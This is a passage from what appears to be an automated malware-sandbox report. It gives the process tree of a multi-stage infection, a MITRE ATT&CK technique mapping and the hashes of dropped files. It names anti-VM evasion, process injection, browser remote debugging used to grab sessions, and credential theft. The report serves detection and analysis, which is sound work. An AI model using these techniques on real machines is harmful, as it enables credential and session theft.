                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2856 /prefetch:2
                                                                                                                    8⤵
                                                                                                                      PID:2240
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:6120
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:4500
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2852 /prefetch:2
                                                                                                                      8⤵
                                                                                                                        PID:3364
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2820 /prefetch:2
                                                                                                                        8⤵
                                                                                                                          PID:5208
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
                                                                                                                          8⤵
                                                                                                                            PID:2496
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3316 /prefetch:2
                                                                                                                            8⤵
                                                                                                                              PID:2580
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3300 /prefetch:2
                                                                                                                              8⤵
                                                                                                                                PID:4936
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4280 /prefetch:2
                                                                                                                                8⤵
                                                                                                                                  PID:1232
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4396 /prefetch:2
                                                                                                                                  8⤵
                                                                                                                                    PID:4816
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 972
                                                                                                                                6⤵
                                                                                                                                • Program crash
                                                                                                                                PID:1844
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1812
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1992
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3236
                                                                                                                              • C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe
                                                                                                                                "C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe" -burn.filehandle.attached=824 -burn.filehandle.self=828
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4816
                                                                                                                                • C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe
                                                                                                                                  C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:1548
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                                                                                                                                    8⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:4496
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      9⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4232
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                                                                                                                                        10⤵
                                                                                                                                          PID:5736
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 832
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:3484
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 900
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:2020
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10097350101\bPDDW9F.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10097350101\bPDDW9F.exe"
                                                                                                                                5⤵
                                                                                                                                • Downloads MZ/PE file
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3528
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10097360101\91959916b2.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10097360101\91959916b2.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:5436
                                                                                                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:1112
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10097370101\d3b455f478.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10097370101\d3b455f478.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:5488
                                                                                                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:6044
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:5436
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:5700
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:5504
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 980
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5536
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10097390101\cc58b24bf3.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10097390101\cc58b24bf3.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:836
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10097400101\5c429c4670.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10097400101\5c429c4670.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:3872
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
                                                                                                                                              3⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:1064
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2072
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5104
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:1580
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4424 -ip 4424
                                                                                                                                          1⤵
                                                                                                                                            PID:3168
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:920
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3776 -ip 3776
                                                                                                                                            1⤵
                                                                                                                                              PID:4416
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:392
                                                                                                                                            • C:\ProgramData\wtvfpcb\hijexpw.exe
                                                                                                                                              C:\ProgramData\wtvfpcb\hijexpw.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:5100
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3248
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4816 -ip 4816
                                                                                                                                              1⤵
                                                                                                                                                PID:3588
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4816 -ip 4816
                                                                                                                                                1⤵
                                                                                                                                                  PID:5072
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2628
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5212
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2596
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5436 -ip 5436
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5728

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                        Reconnaissance

                                                                                                                                                        Resource Development

                                                                                                                                                        Initial Access

                                                                                                                                                        Execution

                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                        1
                                                                                                                                                        T1059

                                                                                                                                                        PowerShell

                                                                                                                                                        1
                                                                                                                                                        T1059.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053.005

                                                                                                                                                        Persistence

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Modify Authentication Process

                                                                                                                                                        1
                                                                                                                                                        T1556

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053.005

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053.005

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Modify Authentication Process

                                                                                                                                                        1
                                                                                                                                                        T1556

                                                                                                                                                        Modify Registry

                                                                                                                                                        1
                                                                                                                                                        T1112

                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                        2
                                                                                                                                                        T1497

                                                                                                                                                        Credential Access

                                                                                                                                                        Credentials from Password Stores

                                                                                                                                                        1
                                                                                                                                                        T1555

                                                                                                                                                        Credentials from Web Browsers

                                                                                                                                                        1
                                                                                                                                                        T1555.003

                                                                                                                                                        Modify Authentication Process

                                                                                                                                                        1
                                                                                                                                                        T1556

                                                                                                                                                        Steal Web Session Cookie

                                                                                                                                                        1
                                                                                                                                                        T1539

                                                                                                                                                        Unsecured Credentials

                                                                                                                                                        3
                                                                                                                                                        T1552

                                                                                                                                                        Credentials In Files

                                                                                                                                                        3
                                                                                                                                                        T1552.001

                                                                                                                                                        Discovery

                                                                                                                                                        Browser Information Discovery

                                                                                                                                                        1
                                                                                                                                                        T1217

                                                                                                                                                        Query Registry

                                                                                                                                                        7
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        5
                                                                                                                                                        T1082

                                                                                                                                                        System Location Discovery

                                                                                                                                                        1
                                                                                                                                                        T1614

                                                                                                                                                        System Language Discovery

                                                                                                                                                        1
                                                                                                                                                        T1614.001

                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                        2
                                                                                                                                                        T1497

                                                                                                                                                        Lateral Movement

                                                                                                                                                        Collection

                                                                                                                                                        Data from Local System

                                                                                                                                                        3
                                                                                                                                                        T1005

                                                                                                                                                        Command and Control

                                                                                                                                                        Exfiltration

                                                                                                                                                        Impact

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\ProgramData\6xb1d\0rqq1n
                                                                                                                                                          Filesize

                                                                                                                                                          114KB

                                                                                                                                                          MD5

                                                                                                                                                          ee397aaf61a98698a7f29b173816759b

                                                                                                                                                          SHA1

                                                                                                                                                          6fb86529c834ee09a432384fc0b126052986c394

                                                                                                                                                          SHA256

                                                                                                                                                          6b4aef8a36045f80bbbd799331f453f0058a7e9b1553e00e10faefc9432c5a04

                                                                                                                                                          SHA512

                                                                                                                                                          25e0214f518bd7d8330b8dbf44f726de6f26a9840197c5beeed7a466d28538c21cb82681d6a4a99a25d5f62483e703078de5eb912a861770ce67656faeee22b0

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\ProgramData\6xb1d\2nyctr
                                                                                                                                                          Filesize

                                                                                                                                                          160KB

                                                                                                                                                          MD5

                                                                                                                                                          f310cf1ff562ae14449e0167a3e1fe46

                                                                                                                                                          SHA1

                                                                                                                                                          85c58afa9049467031c6c2b17f5c12ca73bb2788

                                                                                                                                                          SHA256

                                                                                                                                                          e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

                                                                                                                                                          SHA512

                                                                                                                                                          1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\ProgramData\6xb1d\cjmy58
                                                                                                                                                          Filesize

                                                                                                                                                          9KB

                                                                                                                                                          MD5

                                                                                                                                                          87949773dc6644796e4afdc036d8f58e

                                                                                                                                                          SHA1

                                                                                                                                                          a80987d3f2e45b23b35a1defaf8fe1e69cf56419

                                                                                                                                                          SHA256

                                                                                                                                                          0e21442c4e555f1df28bd3c332f7a947f92577082ff48b2814256df45fc177fe

                                                                                                                                                          SHA512

                                                                                                                                                          0e995463e6c513fd1b161f8503f3ed5e4ae0c0c5e9d1a601be1523db0f9bc180068754480ee3d518f5bb911df62708f77ddc838e5c7c3ad880309b6ec4a6c697

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\ProgramData\wtj58\as00z58g4
                                                                                                                                                          Filesize

                                                                                                                                                          40KB

                                                                                                                                                          MD5

                                                                                                                                                          a182561a527f929489bf4b8f74f65cd7

                                                                                                                                                          SHA1

                                                                                                                                                          8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                                          SHA256

                                                                                                                                                          42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                                          SHA512

                                                                                                                                                          9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\Temp\iKyDhmRkP.hta
                                                                                                                                                          Filesize

                                                                                                                                                          779B

                                                                                                                                                          MD5

                                                                                                                                                          39c8cd50176057af3728802964f92d49

                                                                                                                                                          SHA1

                                                                                                                                                          68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                                                                                          SHA256

                                                                                                                                                          f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                                                                                          SHA512

                                                                                                                                                          cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                          Filesize

                                                                                                                                                          40B

                                                                                                                                                          MD5

                                                                                                                                                          37146d048bb6c4fe09bf6e6cd7568dd6

                                                                                                                                                          SHA1

                                                                                                                                                          f45d995f00f4d9f7cbe22375c016d466425d7f1c

                                                                                                                                                          SHA256

                                                                                                                                                          69ac9406b76b4df9b8448f5514ca141d4e10063b4c0212118b34f826644b0675

                                                                                                                                                          SHA512

                                                                                                                                                          9cd9a84ec572f0a5a5d7387613e05ff2f8f56267c4f8039eb9d570a1487970628773c929d44466271611993282ee2e0ad5dbada5a5fa45f2595c3a578b2dd0b9

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                                                                                                          Filesize

                                                                                                                                                          649B

                                                                                                                                                          MD5

                                                                                                                                                          b33bbe0932c1ac49454bc249c6e88cea

                                                                                                                                                          SHA1

                                                                                                                                                          3c07fcb95060cbf7f062532df829bb3dc4e4eedb

                                                                                                                                                          SHA256

                                                                                                                                                          ae85417fa816a513eeb164c9384a8deacc2f1969fba28130b581f06dc02f558c

                                                                                                                                                          SHA512

                                                                                                                                                          1d31fbad11337bef3bc95e5950b6f573de115016cb4e432e7ae24238fff402939ec96d8bd40ccca49e726e9d7eea8d22daa03983e30a9b461a4916be434ce359

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
                                                                                                                                                          Filesize

                                                                                                                                                          851B

                                                                                                                                                          MD5

                                                                                                                                                          07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                                                          SHA1

                                                                                                                                                          6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                                                          SHA256

                                                                                                                                                          6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                                                          SHA512

                                                                                                                                                          7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                                                          Download Submit

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
                                                                                                                                                          Filesize

                                                                                                                                                          854B

                                                                                                                                                          MD5

                                                                                                                                                          4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                                                          SHA1

                                                                                                                                                          fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                                                          SHA256

                                                                                                                                                          6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                                                          SHA512

